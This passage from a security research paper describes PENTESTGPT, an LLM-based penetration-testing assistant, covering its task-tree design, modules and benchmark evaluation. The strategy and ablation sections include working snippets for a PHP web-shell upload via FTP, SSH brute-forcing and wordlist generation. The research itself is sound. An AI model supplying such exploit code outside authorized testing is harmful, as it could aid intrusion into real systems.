Our central design considerations emerged from the three challenges observed in the preceding Exploratory Study (Section 4). The first challenge (Finding 3) pertains to penetration testing context loss due to limited memory retention: LLMs in their original form struggle to maintain such long-term memory because of token size limits. The second obstacle (Finding 4) arises from the LLM chatbots' tendency to emphasize recent conversation content; in penetration testing, this means optimizing only the immediate task, which falls short in the complex, interconnected task environment of penetration testing. The third obstacle (Finding 5) is tied to inaccurate result generation: when tasked to directly produce specific operations for a step in penetration testing, the outputs are often imprecise, sometimes even leading to hallucination.
PENTESTGPT has been engineered to address these challenges, rendering it more apt for penetration testing tasks. We drew inspiration from the methodologies employed by real-world penetration testing teams, where a director plans the overarching procedure and subdivides it into subtasks for individual testers. Each tester independently performs their task and reports the results without an exhaustive understanding of the broader context. The director then determines the following steps, possibly redefining tasks, and triggers the subsequent round of testing. Essentially, the director manages the overall strategy without becoming entrenched in the minutiae of the tests. This approach is mirrored in PENTESTGPT's functionality, enhancing its efficiency and adaptability in conducting penetration tests. Our strategy divides penetration testing into two processes: identifying the next task and generating the concrete operation to complete it. Each process is powered by one LLM session. In this setup, the LLM session responsible for task identification retains the complete context of the ongoing penetration testing status, while the generation of detailed operations and the parsing of information are managed by other sessions. This division of responsibilities fosters effective task execution while preserving the overarching context.
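Viewed as a loop, the director role (task identification, with full context) and the tester role (operation generation, without it) interact as sketched below; all function names here are hypothetical stand-ins for the two kinds of LLM sessions, not the tool's real code.

```python
def ask_director(finding: str) -> str:
    """Stub for the context-keeping reasoning session (the 'director')."""
    return "Test FTP anonymous login" if "ftp" in finding.lower() else "testing complete"

def ask_tester(subtask: str) -> str:
    """Stub for an ephemeral generation session (a 'tester') that sees only its subtask."""
    return f"concrete operation for: {subtask}"

def execute_and_report(operation: str) -> str:
    """In PENTESTGPT, the human user executes the operation and reports the result."""
    return f"result of `{operation}`"

finding = "Port 21 open: FTP service detected"
for _ in range(3):  # bounded director -> tester -> execution rounds
    subtask = ask_director(finding)   # the director retains the overall testing context
    if subtask == "testing complete":
        break
    operation = ask_tester(subtask)   # the tester needs no broader context
    finding = execute_and_report(operation)
    print(finding)
```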
To assist LLMs in effectively carrying out penetration testing tasks, we design a series of prompts that align with user inputs, utilizing the Chain-of-Thought (CoT) [36] methodology. As CoT reveals, LLMs' performance and reasoning capabilities can be significantly enhanced by the input, chain-of-thought, output prompting format, where the chain-of-thought is a series of intermediate natural-language reasoning steps leading to the outcome. We dissect the penetration testing tasks into micro-steps and design prompts with examples to guide LLMs through processing penetration testing information step-by-step, ultimately leading to the desired outcomes. The complete prompts are available at our anonymized open-source project [18].

Figure 3: Overview of PENTESTGPT.
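As an illustration of the input, chain-of-thought, output format, a prompt for interpreting a scan result could be structured as follows; the wording is a hedged example of the format, not one of our released prompts.

```python
# A minimal CoT-style prompt skeleton (illustrative; not the released prompt set).
COT_EXAMPLE = """\
Input: nmap reports ports 21 (vsftpd 2.3.4) and 22 (OpenSSH 7.2) open.
Thought: vsftpd 2.3.4 is a version with a well-known backdoor, so the FTP
service is a more promising lead than brute-forcing SSH.
Output: next sub-task - test the FTP service for the vsftpd 2.3.4 backdoor.
"""

def build_prompt(new_input: str) -> str:
    """Prepend the worked input/chain-of-thought/output example to a new query."""
    return f"{COT_EXAMPLE}\nInput: {new_input}\nThought:"

print(build_prompt("gobuster finds a hidden /admin directory on port 80."))
```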
# 5.3. Reasoning Module
The Reasoning Module plays a pivotal role in our system, analogous to a team lead overseeing the penetration testing task from a macro perspective. It obtains testing results or intentions from the user and prepares the testing strategy for the next step. This testing strategy is passed to the generation module for further planning.
To effectively supervise the penetration testing process and provide precise guidance, it is crucial to translate the testing procedures and outcomes into a natural language format. Drawing inspiration from the concept of an attack tree [37], which is often used to outline penetration testing procedures, we introduce the notion of a pentesting task tree (PTT). This novel representation of the testing status is rooted in the concept of an attributed tree [38]:

Definition 1 (Attributed Tree). An attributed tree is an edge-labeled, attributed polytree G = (V, E, λ, μ) where V is a set of nodes (or vertices), E is a set of directed edges, λ : E → Σ is an edge labeling function assigning a label from the alphabet Σ to each edge, and μ : (V ∪ E) × K → S is a function assigning key-value pairs of properties (keys from K, values from S) to the edges and nodes.
Task Tree:
1. Perform port scanning (completed)
   - Ports 21, 22, and 80 are open.
   - Services are FTP, SSH, and Web Service.
2. Perform the testing
   2.1 Test FTP Service
       2.1.1 Test Anonymous Login (success)
             2.1.1.1 Test Anonymous Upload (success)
   2.2 Test SSH Service
       2.2.1 Brute-force (failed)
   2.3 Test Web Service (ongoing)
       2.3.1 Directory Enumeration
             2.3.1.1 Find hidden admin (to-do)
       2.3.2 Injection Identification (to-do)

b) PTT Representation in Natural Language
Figure 4: Pentesting Task Tree in a) visualized tree format, and b) natural language format encoded in LLM.
Given the definition of an attributed tree, the PTT is defined as follows:
Definition 2 (Pentesting Task Tree). A PTT T is a pair (N, A), where: (1) N is a set of nodes organized in a tree structure. Each node has a unique identifier, and there is a special node called the root that has no parent. Each node other than the root has exactly one parent and zero or more children. (2) A is a function that assigns to each node n ∈ N a set of attributes A(n). Each attribute is a pair (a, v), where a is the attribute name and v is the attribute value. The set of attributes can be different for each node.
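Definitions 1 and 2 translate naturally into a small tree data structure. The Python sketch below is our illustrative rendering of a PTT node, not code from the tool itself.

```python
from dataclasses import dataclass, field

@dataclass
class PTTNode:
    """A pentesting task tree node: one task plus free-form attributes (Definition 2)."""
    identifier: str                                   # unique id, e.g. "2.1.1"
    task: str                                         # e.g. "Test Anonymous Login"
    attributes: dict = field(default_factory=dict)    # (a, v) pairs, e.g. {"status": "success"}
    children: list = field(default_factory=list)

    def add_child(self, node: "PTTNode") -> "PTTNode":
        self.children.append(node)
        return node

# Rebuilding a fragment of the tree shown in Figure 4:
root = PTTNode("2", "Perform the testing")
ftp = root.add_child(PTTNode("2.1", "Test FTP Service"))
ftp.add_child(PTTNode("2.1.1", "Test Anonymous Login", {"status": "success"}))
ssh = root.add_child(PTTNode("2.2", "Test SSH Service"))
ssh.add_child(PTTNode("2.2.1", "Brute-force", {"status": "failed"}))
```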
As outlined in Figure 3, the Reasoning Module's operation unfolds over four key steps operating on the PTT. ❶ Initially, the module absorbs the user's intentions to construct an initial PTT in natural language. This is achieved by carefully instructing the LLM with examples and definitions of the PTT using meticulously crafted prompts. The LLM outputs are parsed to confirm that the tree structure is accurately formatted. Note that, due to the nature of the tree structure, it can be represented in natural language through layered bullets, as illustrated in Figure 4. The Reasoning Module effectively
overcomes the memory-loss issue by maintaining a task tree that encompasses the entire penetration testing process. ❷ After updating the tree information, a verification step is conducted on the newly updated PTT to ascertain its correctness. This process explicitly checks that only the leaf nodes of the PTT have been modified, aligning with the principle that atomic operations in the penetration testing process should only influence the status of the lowest-level sub-tasks. This step confirms the correctness of the reasoning process, safeguarding against any potential alterations to the overall tree structure caused by LLM hallucination. If discrepancies arise, the information is reverted to the LLM for correction and regeneration. ❸ With the updated PTT, the Reasoning Module evaluates the current tree state and pinpoints viable sub-tasks that can serve as candidate steps for further testing. ❹ Finally, the module evaluates the likelihood of these sub-tasks leading to successful penetration testing outcomes. It then recommends the top task as the output.
The expected results of this task are subsequently forwarded to the Generation Module for in-depth analysis. This is feasible, as demonstrated in the exploratory study, since LLMs, particularly GPT-4, can identify potential vulnerabilities when provided with system status information. This procedural approach enables the Reasoning Module to address one of the inherent limitations of LLMs, namely their tendency to concentrate solely on the most recent task. Note that in cases where the tester finds the selected task incorrect, or not completed in the preferred way, they can also manually revise the PTT through the interactive handle discussed further in Section 5.6.
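For concreteness, the following is a minimal sketch of the step-❷ verification, assuming the PTT is held as nested dictionaries mapping a task name to its subtree; the function names are illustrative. The check rejects any regenerated tree in which an interior node of the previous tree disappeared or lost existing children, which is the hallucination symptom the module guards against.

```python
def interior_nodes(tree: dict, prefix: tuple = ()) -> dict:
    """Map each non-leaf node (as a path) to the set of its children."""
    found = {}
    for name, subtree in tree.items():
        if subtree:                                  # non-leaf node
            found[prefix + (name,)] = set(subtree)
            found.update(interior_nodes(subtree, prefix + (name,)))
    return found

def leaf_only_update(old: dict, new: dict) -> bool:
    """True iff every interior node of the old PTT survives with at least
    its previous children; growth is allowed only beneath old leaves or as
    extra children, never as a rewrite of the existing structure."""
    new_interior = interior_nodes(new)
    return all(
        new_interior.get(path, set()) >= kids
        for path, kids in interior_nodes(old).items()
    )

old = {"1. recon": {"1.1 port scan": {}}, "2. testing": {}}
ok  = {"1. recon": {"1.1 port scan": {"1.1.1 service scan": {}}}, "2. testing": {}}
bad = {"2. testing": {}}                             # "1. recon" vanished: reject
assert leaf_only_update(old, ok) and not leaf_only_update(old, bad)
```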
We devise four sets of prompts to sequentially guide the Reasoning Module through each of these stages. To bolster the reproducibility of our results, we further optimize these prompts with a technique known as hint generation [39]. From our practical experience, we observe that LLMs are adept at interpreting the tree-structured information pertinent to penetration testing and can update it accurately in response to test outputs.
# 5.4. Generation Module
The Generation Module translates specific sub-tasks from the Reasoning Module into concrete commands or instructions. Each time a new sub-task is received, a fresh session is initiated in the Generation Module. This strategy effectively isolates the context of the overarching penetration task from the immediate task under execution, enabling the LLM to focus entirely on generating specific commands.
Instead of directly transforming the received sub-task into specific operations, our design employs the CoT strategy [36] to partition this process into two sequential steps. This design decision directly addresses the challenges associated with model inaccuracy and hallucination by enhancing the model's reasoning capability. In particular, ❺ upon receipt of a concise sub-task from the Reasoning Module, the Generation Module begins by expanding it into a sequence of detailed steps. Notably, the prompt
associated with this sub-task requires the LLM to consider the possible tools and operations available within the testing environment. ❻ Subsequently, the Generation Module transforms each of these expanded steps into precise terminal commands ready for execution, or into detailed descriptions of specific Graphical User Interface (GUI) operations to be carried out. This stage-by-stage translation eliminates potential ambiguities, enabling testers to follow the instructions directly and seamlessly. Implementing this two-step process effectively precludes the LLM from generating operations that may not be feasible in real-world scenarios, thereby improving the success rate of the penetration testing procedure.
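The two-step translation can be pictured as two chained LLM calls. The following is a minimal sketch using a generic `ask(prompt)` completion wrapper; the prompt wording is an illustrative paraphrase, not the prompt set shipped with PENTESTGPT.

```python
def generate_instructions(sub_task: str, ask) -> str:
    """Two-step CoT translation of a sub-task into executable commands."""
    # Step 1: expand the terse sub-task into detailed steps, explicitly
    # constrained to tools available in the testing environment.
    steps = ask(
        "Expand the following penetration-testing sub-task into a numbered "
        "list of detailed steps, considering only the tools and operations "
        f"available in the testing environment.\nSub-task: {sub_task}"
    )
    # Step 2: translate every step into an exact terminal command, or a
    # precise description of the GUI operation to carry out.
    return ask(
        "For each step below, output the exact terminal command to run, or "
        f"a precise description of the GUI operation.\nSteps:\n{steps}"
    )
```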
By acting as a bridge between the strategic insights provided by the Reasoning Module and the actionable steps required for conducting a penetration test, the Generation Module ensures that high-level plans are converted into precise and actionable steps. This transformation significantly bolsters the overall efficiency of the penetration testing procedure.
An Illustrative Example. We utilize a real-world running example to illuminate how the Reasoning Module and the Generation Module collaboratively operate to complete penetration testing tasks. Figure 5 illustrates a single iteration of PENTESTGPT working on the HackTheBox machine Carrier [40], a medium-difficulty target. As depicted in a-1), the PTT, in natural language format, encodes the testing status, revealing the open ports (21, 22, 80) on the target machine. The Reasoning Module is subsequently instructed to identify the available tasks. As highlighted in red, service scanning is the only available task on a leaf node of the PTT. This task is therefore chosen and forwarded to the Generation Module for command generation. The generated command
is executed in the testing environment, and the execution result is conveyed to the Reasoning Module to update the PTT. In a-2), the Reasoning Module integrates the previous scanning result into the PTT, cross-referencing it with the earlier PTT to update only the leaf nodes. It then looks for the available tasks to execute. In this case, two tasks emerge: scanning the web service on port 80 and checking the SSH service for known vulnerabilities. The LLM evaluates which task is more promising and chooses to investigate the web service, often seen as more vulnerable. This task is passed to the Generation Module, which turns the general task into a detailed process employing nikto [41], a commonly used web scanning script. The iterative process continues until the tester completes the penetration testing task.
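Put together, one iteration of the loop illustrated in Figure 5 can be summarized as below. The objects and method names are illustrative stand-ins for the three modules and for the tester who executes commands in the environment, not PENTESTGPT's actual interfaces.

```python
def one_iteration(reasoning, generation, parsing, execute, ptt: str) -> str:
    """A single PENTESTGPT iteration over the Pentesting Task Tree."""
    task = reasoning.choose_task(ptt)        # e.g. "scan the web port"
    command = generation.to_commands(task)   # e.g. "nikto -h <ip-address>"
    raw = execute(command)                   # run in the testing environment
    digest = parsing.condense(raw)           # strip verbose tool output
    return reasoning.update_ptt(ptt, task, digest)   # leaf-only update

# Repeated until the testing objective is reached:
#     while not objective_reached(ptt):
#         ptt = one_iteration(reasoning, generation, parsing, execute, ptt)
```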
# 5.5. Parsing Module
The Parsing Module operates as a supportive interface, enabling effective processing of the natural language information exchanged between the user and the other two core modules. Two needs primarily justify the existence of this module. First, security testing tool outputs are typically verbose and laden with extraneous details, making it computationally expensive and unnecessarily redundant to feed
[Figure 5 spans this point in the original layout. Its panels show two consecutive iterations: a-1)/a-2) the task tree before and after the update, b-1)/b-2) the available leaf-node tasks, c-1)/c-2) the decided task, d-1)/d-2) the command to execute (an nmap service scan, then a nikto web scan), and e-1)/e-2) the execution results from the testing environment.]
Figure 5: A demonstration of the task-tree update process on the testing target HTB-Carrier.
these extended outputs directly into the LLMs. Second, users without specialized knowledge in the security domain may struggle to extract key insights from security testing outputs, presenting challenges in summarizing crucial testing information. Consequently, the Parsing Module is essential for streamlining and condensing this information.
The Parsing Module is devised to handle four distinct types of information: (1) user intentions, which are directives provided by the user to dictate the next course of action; (2) security testing tool outputs, which represent the raw outputs generated by an array of security testing tools; (3) raw HTTP web information, which encompasses all raw information derived from HTTP web interfaces; and (4) source code extracted during the penetration testing process. Users must specify the category of the information they provide, and each category is paired with a set of carefully designed prompts. For source code analysis, we integrate the GPT-4 code interpreter [42] to execute the task.
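A dispatch over the four categories might look as follows; the category keys and prompt texts are illustrative only, standing in for the carefully designed prompt set, and `ask` is again a generic LLM completion wrapper.

```python
SUMMARIZATION_PROMPTS = {
    "user_intention": "Restate the tester's directive as one concise goal:\n",
    "tool_output":    "Keep only the security-relevant findings from this "
                      "tool output (ports, services, versions, errors):\n",
    "web_content":    "Extract endpoints, parameters, forms, and software "
                      "versions from this raw HTTP content:\n",
    "source_code":    "Point out potentially vulnerable constructs in this "
                      "source code:\n",
}

def parse_input(category: str, raw: str, ask) -> str:
    """Condense one piece of user-supplied information with the prompt
    paired to its declared category."""
    try:
        prompt = SUMMARIZATION_PROMPTS[category]
    except KeyError:
        raise ValueError(f"unknown input category: {category!r}")
    return ask(prompt + raw)
```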
# 5.6. Active Feedback
While LLMs can produce insightful outputs, their outcomes may sometimes require revision. To facilitate this, we introduce an interactive handle in PENTESTGPT, known as active feedback, which allows the user to interact directly with the Reasoning Module. A vital feature of this process is that it does not alter the context within the Reasoning Module unless the user explicitly desires to update some information. The reasoning context, including the PTT, is stored as a fixed chunk of tokens. This chunk of tokens is provided to a new LLM session during an active feedback interaction, and users can pose questions regarding it. This ensures that the original session remains unaffected, and users can always query the reasoning context without making unnecessary changes. If the user believes it necessary to update the PTT, they can explicitly instruct the model to update the reasoning context history accordingly. This provides a robust and flexible framework for the user to participate actively in the decision-making process.
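The isolation property can be sketched as follows, assuming sessions expose `feed` and `ask` primitives; these names are illustrative rather than PENTESTGPT's actual API.

```python
def active_feedback(reasoning_context: str, question: str, new_session) -> str:
    """Answer a user question about the current reasoning state without
    touching the main Reasoning Module session."""
    side_session = new_session()             # fresh LLM session, separate context
    side_session.feed(reasoning_context)     # fixed chunk of tokens, incl. the PTT
    # Read-only by default: nothing is written back; a PTT change happens
    # only if the user explicitly instructs the main session to update its
    # reasoning context history.
    return side_session.ask(question)
```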
# 5.7. Discussion
We explore various design alternatives for PENTESTGPT to tackle the challenges identified in the exploratory study. We have experimented with different designs, and here we discuss some key decisions.
Addressing Context Loss with Token Size: A straightforward solution to alleviate context loss is to employ LLM models with an extended token size. For instance, GPT-4 provides versions with 8k and 32k token size limits. This approach, however, confronts two substantial challenges. First, even a 32k token size may be inadequate for penetration testing scenarios, as the output of a single testing tool like dirbuster [43] may comprise thousands of tokens. Consequently, GPT-4 with a 32k limit cannot retain the entire testing context. Second, even when the entire conversation history fits within the 32k token boundary, the API may still skew towards recent content, focusing on local tasks and overlooking the broader context. These issues guided us in formulating the design of the Reasoning Module and the Parsing Module.
Vector Database to Improve Context Length: Another technique to extend the effective context of LLMs involves a vector database [44], [45]. By transmuting data into vector embeddings, LLMs can efficiently store and retrieve information, practically creating long-term memory. Theoretically, penetration testing tool outputs could be archived
in the vector database. In practice, though, we observe that many outputs closely resemble one another, varying only in nuanced ways. This similarity often leads to confused information retrieval. Relying solely on a vector database therefore fails to overcome context loss in penetration testing tasks. Integrating a vector database into the design of PENTESTGPT is an avenue for future research.
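The retrieval problem can be illustrated with a toy bag-of-words embedding, shown below: two scan outputs differing only in a version number embed almost identically, so a nearest-neighbour lookup cannot reliably separate them. A production system would use a learned embedding model, but the near-duplicate geometry is the same.

```python
from collections import Counter
from math import sqrt

def embed(text: str) -> Counter:
    """Toy bag-of-words 'embedding', for illustration only."""
    return Counter(text.lower().split())

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[w] * b[w] for w in a)
    na = sqrt(sum(c * c for c in a.values()))
    nb = sqrt(sum(c * c for c in b.values()))
    return dot / (na * nb)

scan_a = "22/tcp open ssh OpenSSH 7.6p1 80/tcp open http Apache 2.4.18"
scan_b = "22/tcp open ssh OpenSSH 7.6p1 80/tcp open http Apache 2.4.29"
print(round(cosine(embed(scan_a), embed(scan_b)), 2))  # 0.92: near-duplicates
```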
Precision in Information Extraction: Precise information extraction is crucial for conserving token usage and avoiding verbosity in LLMs. Rule-based methods are commonly employed to extract diverse information. However, rule-based techniques are expensive to engineer given natural language's inherent complexity and the variety of information types in penetration testing. We devise the Parsing Module to manage several general input information types, a strategy we found to be both feasible and efficient.
Limitations of LLMs: LLMs are not an all-encompassing solution. Present LLMs exhibit flaws, including hallucination [46] and outdated knowledge. Our mitigation efforts, such as implementing task tree verification to ward off hallucination, may not completely prevent the Reasoning Module from producing erroneous outcomes. Thus, a human-in-the-loop strategy becomes vital, facilitating the input of necessary expertise and guidance to steer the LLMs effectively.
# 6. Evaluation
In this section, we assess the performance of PENTESTGPT, focusing on the following four research questions:
RQ3 (Performance): How does the performance of PENTESTGPT compare with that of native LLM models and human experts?
RQ4 (Strategy): Does PENTESTGPT employ different problem-solving strategies compared to those utilized by LLMs or human experts?
RQ5 (Ablation): How does each module within PENTESTGPT contribute to the overall penetration testing performance?
RQ6 (Practicality): Is PENTESTGPT practical and effective in real-world penetration testing tasks?
# 6.1. Evaluation Settings
We implement PENTESTGPT in 1,700 lines of Python3 code with 740 prompts, available at our anonymized project website [18]. We evaluate its performance over the benchmark constructed in Section 3. In this evaluation, we integrate PENTESTGPT with GPT-3.5 and GPT-4 to form two working versions: PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4. Due to the lack of API access, we do not select other LLM models such as Bard. In line with our previous experiments, we use the same experimental environment settings and instruct PENTESTGPT to use only non-automated penetration testing tools.
# 6.2. Performance Evaluation (RQ3)
The overall task completion status of PENTESTGPT-GPT-3.5, PENTESTGPT-GPT-4, and the naive usage of LLMs is illustrated in Figure 6a. As the figure shows, our solutions powered by LLMs demonstrate superior penetration testing capabilities compared to the naive application of LLMs. Specifically, PENTESTGPT-GPT-4 surpasses the other three solutions, successfully solving 6 out of 7 easy-difficulty targets and 2 out of 4 medium-difficulty targets. This performance indicates that PENTESTGPT-GPT-4 can handle penetration testing targets ranging from easy to medium difficulty levels. Meanwhile, PENTESTGPT-GPT-3.5 manages to solve only two challenges of easy difficulty, a discrepancy that can be attributed to GPT-3.5 lacking the penetration-testing knowledge found in GPT-4.
The sub-task completion status of PENTESTGPT-GPT-3.5, PENTESTGPT-GPT-4, and the naive usage of LLMs is shown in Figure 6b. As the figure illustrates, both PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4 perform better than the standard utilization of LLMs. It is noteworthy that PENTESTGPT-GPT-4 not only solves one more medium-difficulty target compared to naive GPT-4 but also accomplishes 111% more sub-tasks (57 vs. 27). This highlights that our design effectively addresses the context loss challenges and leads to more promising testing results. Nevertheless, all the solutions struggle with hard-difficulty testing targets. As elaborated in Section 4, hard-difficulty targets typically demand a deep understanding from the penetration tester. To reach the testing objectives, they may require modifications to existing penetration testing tools or scripts. Our design does not expand the LLMs' knowledge of vulnerabilities, so it does not notably enhance performance on these more complex targets.
# 6.3. Strategy Evaluation (RQ4)
2308.06782 | 63 | # 6.3. Strategy Evaluation (RQ4)
We then investigate the problem-solving strategies employed by PENTESTGPT, contrasting them with those of LLMs and human experts. By manually analyzing the penetration testing process of PENTESTGPT, we synthesize its underlying approaches to problem-solving. We surprisingly find that PENTESTGPT decomposes the penetration testing task in a manner akin to human experts, successfully achieving the overall goal. Instead of focusing solely on the most recently discovered task, PENTESTGPT can pinpoint the potential sub-tasks most likely to lead to successful outcomes.
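To make this behavior concrete, the following minimal sketch shows one way a Pentesting Task Tree (PTT) and a favorability-driven choice of the next sub-task could be represented. The node fields, the scoring heuristic, and the toy values are our illustrative assumptions, not PENTESTGPT's exact internals.

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class TaskNode:
    """One node of a Pentesting Task Tree (PTT)."""
    description: str            # e.g., "enumerate FTP service on port 21"
    completed: bool = False
    favorability: float = 0.0   # assumed score: how likely this task leads to progress
    children: List["TaskNode"] = field(default_factory=list)

def next_task(root: TaskNode) -> Optional[TaskNode]:
    """Pick the uncompleted leaf with the highest favorability score,
    searching the whole tree rather than only the newest branch."""
    best: Optional[TaskNode] = None
    stack = [root]
    while stack:
        node = stack.pop()
        if node.children:
            stack.extend(node.children)
        elif not node.completed and (best is None or node.favorability > best.favorability):
            best = node
    return best

# Toy usage: two services discovered on the same target.
root = TaskNode("test 192.168.1.10", children=[
    TaskNode("enumerate FTP (21)", favorability=0.8),
    TaskNode("browse web service (80)", favorability=0.6),
])
print(next_task(root).description)  # -> "enumerate FTP (21)"
```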
Figure 7 provides an illustrative example, demonstrating the strategic differences between GPT-4 and PENTESTGPT while handling the VulnHub machine Hackable II [47]. This target comprises two vulnerable services: an FTP service allowing arbitrary file uploads and a web service enabling the viewing of files uploaded through FTP. A successful exploit necessitates leveraging both services: uploading a malicious PHP shell via the FTP service and triggering it through the web service. As depicted in the figure, GPT-4 begins by enumerating the FTP service and successfully identifies the file upload vulnerability (❶-❸). However, it fails to correlate
this with the web service, resulting in an incomplete exploit in the following steps. Conversely, PENTESTGPT follows a more holistic approach, toggling between enumerating the FTP service and browsing the web service. In particular, PENTESTGPT first ❶ enumerates the FTP service and ❷ the web service to understand the general situation. It then ❸ prioritizes the FTP service and ❹ eventually discovers the file upload vulnerability. More importantly, in this process, PENTESTGPT identifies that the files available over FTP are the same as those served by the web service. By connecting these findings, PENTESTGPT guides the tester to ❺ perform a shell upload, ❻ leading to a successful reverse shell. This strategy aligns with the walkthrough solution and highlights PENTESTGPT's comprehensive understanding of the penetration testing process and its ability to make effective decisions on the optimal sub-task to pursue next. It reveals PENTESTGPT's strategic thinking and its capacity to integrate different aspects of the testing process.

Figure 7: Penetration testing strategy comparison between GPT-4 and PENTESTGPT on VulnHub Hackable II.
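For readers unfamiliar with this upload-then-trigger pattern, a minimal sketch is given below. It assumes an isolated lab target; the address, credentials, and web path are hypothetical placeholders rather than values taken from Hackable II.

```python
import ftplib
import io
import urllib.request

TARGET = "192.168.56.101"  # hypothetical lab-only address
PAYLOAD = b"<?php system($_GET['cmd']); ?>"  # classic single-line PHP command shell

# Step 1: abuse the FTP service that permits arbitrary file uploads.
ftp = ftplib.FTP(TARGET)
ftp.login("anonymous", "anonymous@")  # assumes anonymous upload is allowed
ftp.storbinary("STOR shell.php", io.BytesIO(PAYLOAD))
ftp.quit()

# Step 2: trigger the uploaded file through the web service, which serves
# the same directory that the FTP service writes into.
resp = urllib.request.urlopen(f"http://{TARGET}/files/shell.php?cmd=id")
print(resp.read().decode())
```

In the scenario above, the same two steps would deliver the reverse shell payload described in the walkthrough instead of echoing command output.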
Our second observation is that, although PENTESTGPT behaves more similarly to human experts, it still exhibits some strategies that humans would not apply. For instance, PENTESTGPT still prioritizes brute-force attacks over vulnerability scanning; this is obvious in cases where PENTESTGPT always tries to brute-force the SSH service on target machines.
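The brute-force routine it reaches for is the standard one. A minimal sketch is shown below, assuming the third-party paramiko library; the host, username, and candidate passwords are hypothetical lab-only values.

```python
import paramiko

def brute_force_ssh(host, user, candidates):
    """Return the first password that opens an SSH session, or None."""
    for password in candidates:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(host, username=user, password=password, timeout=5)
            return password
        except paramiko.AuthenticationException:
            continue  # wrong guess; move on to the next candidate
        finally:
            client.close()
    return None

print(brute_force_ssh("192.168.56.101", "root", ["toor", "password", "admin"]))
```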
We then analyze the failed penetration testing cases to understand the limitations of PENTESTGPT. Beyond the absence of some advanced penetration testing techniques, two primary issues emerge. First, PENTESTGPT struggles
to interpret images. LLMs are limited to text comprehension, so they cannot accurately process images. This issue might be addressed by developing large multimodal models that understand both text and visual data. Second, it cannot grasp certain social-engineering tricks and subtle cues. For instance, real-world penetration testers often create brute-force wordlists using information gathered from the target service. Though PENTESTGPT can retrieve a list of names from a web service, it fails to instruct the use of tools to create a wordlist from those names. These limitations underline the necessity for improvement in areas where human insight and intricate reasoning remain more proficient than automated solutions.
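To illustrate the missing step, the sketch below derives a small candidate wordlist from names gathered off a target page, in the spirit of dedicated wordlist generators; the mangling rules and the example names are illustrative assumptions.

```python
import itertools

def build_wordlist(names, years=("2022", "2023")):
    """Derive candidate passwords from gathered names with simple mangling rules."""
    candidates = set()
    for name in names:
        base = name.lower()
        variants = (base, base.capitalize(), base[::-1])
        for variant, suffix in itertools.product(variants, ("", "!", "123", *years)):
            candidates.add(variant + suffix)
    return sorted(candidates)

# Names as they might be scraped from a target's "About" page (illustrative).
print(build_wordlist(["alice", "bob"])[:8])
```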
# 6.4. Ablation Study (RQ5)
We perform an ablation study on how the three modules, namely the Reasoning Module, the Generation Module, and the Parsing Module, contribute to the performance of PENTESTGPT. We implement three variants (a configuration sketch follows the list):
1) PENTESTGPT-NO-PARSING: the Parsing Module is deactivated, causing all data to be fed directly into the system.
2) PENTESTGPT-NO-GENERATION: the Generation Module is deactivated, so task generation is completed within the Reasoning Module itself. The prompts for task generation remain consistent.
3) PENTESTGPT-NO-REASONING: the Reasoning Module is disabled. Instead of the PTT, this variant adopts the same methodology utilized with LLMs for penetration testing, as delineated in the Exploratory Study.
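The sketch below shows how such module toggles might be wired together; the flag names, the stand-in functions, and the dispatch logic are illustrative assumptions rather than PENTESTGPT's actual interface.

```python
from dataclasses import dataclass

# Trivial stand-ins for the three module calls (placeholders, not real logic).
def condense(raw: str) -> str:
    return raw[:200]  # Parsing Module: shrink raw tool output

def update_ptt(text: str) -> str:
    return f"PTT-derived next task for: {text[:40]}"  # Reasoning Module

def ask_llm(text: str) -> str:
    return f"direct LLM suggestion for: {text[:40]}"  # naive fallback

def expand_to_commands(task: str) -> str:
    return f"concrete command sequence for: {task[:40]}"  # Generation Module

@dataclass
class AblationConfig:
    use_parsing: bool = True     # condense raw tool output before reasoning
    use_reasoning: bool = True   # maintain the task tree across the session
    use_generation: bool = True  # expand a sub-task into concrete operations

def handle_tool_output(raw: str, cfg: AblationConfig) -> str:
    text = condense(raw) if cfg.use_parsing else raw
    task = update_ptt(text) if cfg.use_reasoning else ask_llm(text)
    return expand_to_commands(task) if cfg.use_generation else task

print(handle_tool_output("21/tcp open ftp vsftpd 3.0.3", AblationConfig(use_generation=False)))
```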
Figure 8: Overall target completion and sub-task completion of PENTESTGPT and its ablation variants PENTESTGPT-NO-PARSING, PENTESTGPT-NO-GENERATION, and PENTESTGPT-NO-REASONING.

All the variants are integrated with the GPT-4 API for testing. The results of the three variants tested on our penetration testing benchmark are depicted in Figure 8. In general, PENTESTGPT demonstrates superiority over the three ablation baselines regarding overall target and sub-task completion. Our key findings are as follows: (1) In the absence of the Parsing Module, PENTESTGPT-NO-PARSING attains marginally lower performance in overall task and sub-task completion relative to the full configuration. While parsing information is advantageous in penetration testing,
the 32k token size limit often suffices for various outputs. Given the Reasoning Module's inherent design to maintain the entire testing context, the lack of the Parsing Module does not substantially impair the tool's performance. (2) PENTESTGPT-NO-REASONING fares the worst, completing only 53.6% of the sub-tasks achieved by the full solution, an outcome even inferior to the naive application of GPT-4 in testing. We attribute this to the Generation Module adding supplementary sub-tasks to the LLM context. Since the prompts are not tailored for scenarios without the Reasoning Module, the resulting outputs are irrelevant for the naive LLM without the Generation Module. Furthermore, the extended generation output obscures the original context, hindering the LLM's ability to concentrate on the task, thus failing the test. (3) PENTESTGPT-NO-GENERATION realizes performance slightly above that of GPT-4 employed naively. This occurs because, without the Generation Module, the testing procedure closely resembles the naive usage of LLMs. Notably, the Generation Module is principally intended to guide the tester in executing precise penetration testing operations. Without it, the tester may depend on supplementary information to operate the tools or scripts essential for completing the test.
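To illustrate why condensed input matters under a fixed context window, here is a minimal sketch of the chunking step a Parsing Module performs before summarization; the four-characters-per-token estimate is a rough assumption, and a real implementation would use a proper tokenizer.

```python
def rough_token_count(text: str) -> int:
    return len(text) // 4  # crude estimate: ~4 characters per English token

def chunk_for_context(output: str, limit: int = 32_000) -> list:
    """Split a long tool output (e.g., a web page source or scan log) into
    pieces that each fit within the model's context window."""
    chunks, current, size = [], [], 0
    for line in output.splitlines(keepends=True):
        line_tokens = rough_token_count(line)
        if size + line_tokens > limit and current:
            chunks.append("".join(current))
            current, size = [], 0
        current.append(line)
        size += line_tokens
    if current:
        chunks.append("".join(current))
    return chunks

print(len(chunk_for_context("GET /index.html\n" * 50_000)))  # -> several chunks
```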
# 6.5. Practicality Study (RQ6)
